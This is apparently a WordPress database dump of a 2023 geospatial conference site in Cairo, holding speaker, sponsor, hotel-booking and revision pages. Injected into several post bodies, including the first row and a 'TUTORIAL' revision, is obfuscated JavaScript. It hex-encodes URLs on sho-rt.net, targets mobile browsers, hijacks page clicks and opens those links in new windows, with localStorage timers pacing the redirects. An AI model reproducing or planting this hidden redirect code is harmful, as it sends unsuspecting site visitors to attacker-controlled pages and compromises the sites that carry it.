_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Dr. KHALED LOTFY ALI AL-AZAB','','publish','closed','closed','','prof-dr-khaled-lotfy-ali-al-azab','','','2023-06-03 12:06:24','2023-06-03 12:06:24','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=4633',0,'dt_team','',0),
(4634,1,'2023-06-03 12:06:10','2023-06-03 12:06:10','','as','','inherit','open','closed','','as','','','2023-06-03 12:06:10','2023-06-03 12:06:10','',4633,'https://gsw2023.com/wp-content/uploads/2023/06/as.jpg',0,'attachment','image/jpeg',0),
(4635,1,'2023-06-06 16:08:07','2023-06-06 16:08:07','<p>[vc_row][vc_column][dt_portfolio_masonry content_alignment=\"center\" image_border_radius=\"10px\" image_paddings=\"15px 0px 15px 0px\" post_date=\"n\" post_category=\"n\" post_author=\"n\" post_comments=\"n\" post_content=\"off\" read_more_button=\"off\" show_link=\"n\" project_icon_border_width=\"0px\" project_icon_color=\"#ffffff\" project_icon_color_hover=\"#ffffff\" posts_offset=\"0\" category=\"69\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','TUTORIAL','','inherit','closed','closed','','3670-revision-v1','','','2023-06-06 16:08:07','2023-06-06 16:08:07','',3670,'https://gsw2023.com/?p=4635',0,'revision','',0),
(4636,1,'2023-06-09 13:31:48','2023-06-09 13:31:48','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609238799{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1685791591251{margin-top: 260px !important;}\"]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2271\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png\" alt=\"\" width=\"105\" height=\"104\" /></p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791357227{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong><img class=\"alignnone wp-image-4613\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"80\" height=\"106\" /></strong></span></h4>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791546373{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><img class=\"alignnone wp-image-2272\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"106\" height=\"106\" /></span></h4>\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" 